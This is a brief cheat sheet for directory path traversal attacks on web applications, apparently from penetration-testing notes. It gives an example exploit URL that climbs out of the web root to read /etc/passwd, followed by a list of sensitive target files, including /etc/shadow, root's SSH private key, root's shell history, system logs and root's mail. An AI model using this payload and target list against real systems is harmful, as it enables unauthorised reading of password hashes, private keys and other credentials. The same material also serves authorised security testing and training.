Directory Path Traversal

Usual web app location: /var/www/html

Access sensitive files example:

http://site.com/get.php?file=../../../etc/passwd

Files to test:

/etc/issue

/etc/profile

/proc/version

/etc/passwd

/etc/shadow

/root/.bash_history

/root/.ssh/id_rsa

/var/log/dmessage

/var/log/apache2/access.log

/var/mail/root

C:\boot.ini